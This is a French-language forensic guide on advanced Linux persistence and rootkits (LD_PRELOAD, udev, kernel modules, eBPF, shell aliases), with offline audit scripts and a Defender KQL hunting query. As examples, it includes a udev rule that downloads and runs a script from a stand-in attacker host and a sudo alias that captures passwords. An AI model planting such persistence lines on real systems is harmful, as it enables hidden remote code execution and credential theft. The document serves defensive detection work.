Analyse d'Artefact : Persistance Avancée Linux et Rootkits

Danger

Résumé exécutif : les mécanismes de persistance standards (tâches Cron, services Systemd) ajoutent de nouvelles tâches à un système. Les mécanismes de persistance avancée altèrent le comportement du système d’exploitation lui-même. En déployant des rootkits en espace utilisateur (via LD_PRELOAD), des rootkits en mode noyau (LKM), ou des portes dérobées (backdoors) eBPF modernes, les acteurs de la menace peuvent détourner (hooker) les appels système natifs pour cacher activement leurs processus, leurs fichiers et leurs connexions réseau. Pour les analystes DFIR, se fier à la sortie des commandes standards (ls, ps, netstat) sur un système compromis en cours d’exécution est une erreur critique. L’analyse doit s’appuyer sur la forensique hors ligne (dead-disk) ou sur des outils de triage en mémoire hautement spécialisés.

1. Rootkits en espace utilisateur : le détournement LD_PRELOAD

La technique la plus courante pour obtenir de la furtivité sans nécessiter d’accès au niveau du noyau est le détournement de l’espace utilisateur (User-Mode Hooking) via la manipulation de l’éditeur de liens dynamique (dynamic linker).

Sous Linux, la variable d’environnement LD_PRELOAD ou le fichier de configuration global /etc/ld.so.preload ordonne au chargeur de programmes de charger un objet partagé spécifique (une bibliothèque .so) avant toute autre bibliothèque, y compris la bibliothèque C standard (libc).

Le mécanisme d’attaque : un attaquant dépose une bibliothèque partagée malveillante et l’enregistre dans /etc/ld.so.preload. Cette bibliothèque malveillante intercepte (hook) les fonctions système standards comme readdir (utilisée par ls) ou fopen (utilisée par cat). Lorsqu’un administrateur système tape ls, la fonction readdir de l’attaquant s’exécute en premier. Elle appelle la fonction readdir légitime, filtre et supprime la ligne contenant le nom de fichier du malware, et renvoie la liste nettoyée à l’administrateur. Le malware devient totalement invisible pour les outils de l’espace utilisateur.

Triage DFIR hors ligne : en supposant que l’image forensique soit montée sur /mnt/analyse/ :

hunt_ld_preload.sh

# Vérifie si le fichier de préchargement global existe et contient des entrées
cat /mnt/analyse/etc/ld.so.preload

# Examine les variables d'environnement des comptes de service compromis
cat /mnt/analyse/proc/*/environ | tr '\0' '\n' | grep "LD_PRELOAD"

Alerte rouge : le fichier /etc/ld.so.preload est vide ou inexistant sur 99 % des systèmes Linux sains. Toute entrée au sein de ce fichier doit être traitée comme un indicateur de compromission (IOC) sévère.

2. Persistance par déclenchement d’événement : règles Udev

Udev est le gestionnaire de périphériques du noyau Linux. Il utilise des règles pour dicter les actions que l’OS doit entreprendre lorsque des événements matériels se produisent (ex: branchement d’une clé USB, ou initialisation d’une interface réseau).

Les acteurs de la menace abusent de ce mécanisme pour déclencher des charges utiles de manière asynchrone, évitant ainsi l’analyse traditionnelle de la séquence de démarrage.

• L’attaque : l’adversaire crée une règle malveillante dans /etc/udev/rules.d/ ou /lib/udev/rules.d/.
• La charge utile : ACTION=="add", SUBSYSTEM=="net", RUN+="/usr/bin/wget http://attaquant.com/backdoor.sh -O /tmp/x; sh /tmp/x"
• Valeur forensique : cette règle garantit que chaque fois qu’une interface réseau s’active, la backdoor est automatiquement téléchargée et exécutée. Les analystes doivent explicitement rechercher (grep) la directive RUN+= dans les répertoires udev.

3. Persistance Ring 0 : modules noyau et eBPF

Lorsque les acteurs de la menace obtiennent un accès root, ils tentent fréquemment de charger du code directement dans le noyau, obtenant ainsi la domination ultime du système.

A. Modules noyau chargeables (LKM - Loadable Kernel Modules)

Les attaquants compilent un module malveillant .ko (Kernel Object) et le chargent en utilisant insmod ou modprobe. Un LKM peut manipuler les structures internes du noyau (comme la table des appels système) pour cacher des processus de la propre liste des tâches du noyau, contourner entièrement les pare-feux iptables et octroyer des shells root invisibles.

• Chasse hors ligne : pour survivre aux redémarrages, les LKM doivent être enregistrés dans la configuration de démarrage. Les analystes doivent auditer :
  • /mnt/analyse/etc/modules
  • /mnt/analyse/etc/modules-load.d/
  • /mnt/analyse/etc/modprobe.d/

B. La menace moderne : backdoors eBPF

L’Extended Berkeley Packet Filter (eBPF) permet l’exécution sécurisée de programmes en bac à sable (sandboxed) au sein du noyau sans avoir à charger un LKM. En 2025/2026, les familles de malwares sophistiqués (comme BPFDoor ou Symbiote) ont basculé vers eBPF. Les attaquants utilisent eBPF pour filtrer les paquets réseau avant même qu’ils n’atteignent le pare-feu, créant des déclencheurs de “paquets magiques” invisibles qui génèrent des shells root uniquement lorsqu’un paquet spécifique et forgé frappe l’interface réseau.

Astuce

L’indicateur de noyau corrompu (Tainted Kernel) : si vous effectuez une réponse à chaud (Live Response), vérifiez l’indicateur d’altération du noyau : cat /proc/sys/kernel/tainted. Si la valeur n’est pas 0, le noyau a chargé des modules non signés ou propriétaires. Bien que ce ne soit pas une preuve définitive de la présence d’un rootkit, il s’agit d’un indice contextuel critique.

4. Détournement de Shell (Backdoors niveau utilisateur)

Une persistance furtive ne nécessite pas toujours des privilèges root. Les attaquants établissent souvent des portes dérobées au sein de l’environnement interactif d’un utilisateur spécifique.

En modifiant les scripts d’initialisation du shell (ex: ~/.bashrc, ~/.bash_profile, ~/.zshrc), les attaquants peuvent créer des alias ou des fonctions malveillantes.

• Exemple d’attaque : alias sudo='sudo /tmp/.hidden_stealer.sh'
• Le résultat : la prochaine fois que l’utilisateur compromis tente d’exécuter une commande privilégiée, le script de l’attaquant intercepte le mot de passe en clair avant de le transmettre au binaire sudo légitime.

5. Triage DFIR et requêtes de Threat Hunting

Bash (Audit Rootkit hors ligne)

audit_advanced_persistence.sh

#!/bin/bash
TARGET_DIR="/mnt/analyse"

echo "[+] Audit de LD_PRELOAD..."
if [ -f "$TARGET_DIR/etc/ld.so.preload" ]; then
    echo "ALERTE : ld.so.preload existe ! Contenu :"
    cat "$TARGET_DIR/etc/ld.so.preload"
fi

echo "[+] Audit des règles Udev pour les directives dexécution..."
grep -r "RUN+=" $TARGET_DIR/etc/udev/rules.d/ $TARGET_DIR/lib/udev/rules.d/

echo "[+] Audit des configurations de chargement automatique LKM..."
ls -la $TARGET_DIR/etc/modules-load.d/
cat $TARGET_DIR/etc/modules 2>/dev/null | grep -v "^#"

KQL (Defender XDR)

hunt_kernel_module_load.kql

// Détecte le chargement suspect de modules noyau via insmod ou modprobe
DeviceProcessEvents
| where FileName in~ ("insmod", "modprobe")
// Filtrer le chargement des modules OS standards pendant la séquence de démarrage
| where ProcessCommandLine !contains "systemd"
// Mettre en évidence les modules chargés depuis des répertoires inhabituels (ex: /tmp, /dev/shm)
| extend SuspiciousPath = iff(ProcessCommandLine matches regex @"(/tmp/|/dev/shm/|/var/tmp/)", 1, 0)
| project TimeGenerated, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine, SuspiciousPath
| sort by SuspiciousPath desc, TimeGenerated desc

---

Références et lectures complémentaires

• MITRE ATT&CK : Hijack Execution Flow: LD_PRELOAD (T1574.006)
• MITRE ATT&CK : Boot or Logon Autostart Execution: Kernel Modules (T1547.006)
• SANS Institute : Linux Threat Hunting
• Artefact lié : Persistance Linux via les services Systemd
• Artefact lié : Artefacts SSH Linux et persistance
• Chasse en direct : Analyse des processus et de la mémoire volatile Linux